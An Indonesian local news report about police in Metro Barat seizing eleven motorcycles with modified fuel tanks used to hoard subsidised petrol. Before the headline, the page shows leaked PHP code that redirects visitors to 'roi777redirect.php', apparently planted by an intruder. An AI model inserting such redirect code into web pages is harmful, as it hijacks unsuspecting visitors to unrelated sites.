header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Premium Langka, Banyak Kecurangan Memodifikasi Tangki Motor -
Premium Langka, Banyak Kecurangan Memodifikasi Tangki Motor

TRANSLAMPUNG.COM, METRO – Tak menghiraukan keselamatan mengemudi bagi diri sendiri dan orang lain. 11 motor milik pengemudi yang hendak membeli bbm berjenis premium diamankan. Pasalnya ada kejanggalan pada jenis tangki kendaraan roda dua itu, tangki dimodifikasi hingga menampung puluhan liter bbm.

Kepolisian Sektor (Polsek) Metro Barat mengamankan ke sebelas motor tersebur dari SPBU 24.341.09 Jalan Jendral Sudirman, Kelurahan Ganjar Asri, Metro Barat sekira pukul 17.00 WIB, Jum’at (13/7) Kemarin.

Wakapolsek Metro Barat Ipda Kosim menjelaskan diamankan adalah 9 unit moge atau motor gede dan 2 unit motor bebek. “Semua kendaraan diamankan polisi dalam posisi sedang antri bahan bakar jenis premium di SPBU tersebut, dan semua tangkinya termodifikasi,” katanya.

Menurutnya saat dilakukan pemeriksaan, pemilik tidak ada yang mengakui kendaraan tersebut. “Melihat kondisi antrian sedang berlangsung hingga terjadi kemacetan, di ambil tindakan untuk mengamankan sepeda motor tersebut,” lanjutnya.

Saat ini kesebelas motor tersebut diamankan di Mapolsek Metro Barat. Aiptu Zainal selaku Kanit SPK saat ditemui di Mapolsek Metro Barat mengatakan, dikhawatirkan pemilik kendaraan memonopoli bbm jenis premium tersebut.

Menurutnya jika pemilik ingin mengambil kendaraan itu, pemilik harus memiliki surat-surat dan siap merubah motor kembali ke bentuk semula. “Kemungkinan pemiliknya ada yang warga Metro dan luar Metro, kalau mau diambil harus memiliki surat-surat dan motor harus dipulihkan, kemudian juga akan diberikan pembinaan kepada mereka,” katanya.

Kapolres Metro AKBP Umi Fadillah Astutik mengungkapkan, praktik tersebut telah berlangsung lama sehingga Petugas melakukan tindakan pengamanan.

“Polres Metro memang sedang melaksanakan pengamanan di beberapa obyek vital, salah satunya di SPBU Ganjar Asri Metro Barat. Hal ini kita lakukan untuk menertibkan warga masyarakat untuk membeli BBM sesuai aturan, sehingga ada azas pemerataan untuk warga sekitar,” ucapnya.

Kapolres menyampaikan, kegiatan penertiban di SPBU yang dilaksanakan oleh Anggota Polsek Metro Barat tersebut merupakan Kegiatan Kepolisian Yang Ditingkatan (KKYD) dengan harapan agar praktek pelangsiran BBM tidak lagi terjadi di SPBU Kota Metro.

“Saya berharap, agar pihak SPBU juga bekerjasama untuk menolak masyarakat yang membeli tidak sesuai aturan. Dan, untuk warga silakan membeli BMM sesuai kebutuhannya dan ikuti aturannya,” tegasnya. (suf)

News Reporter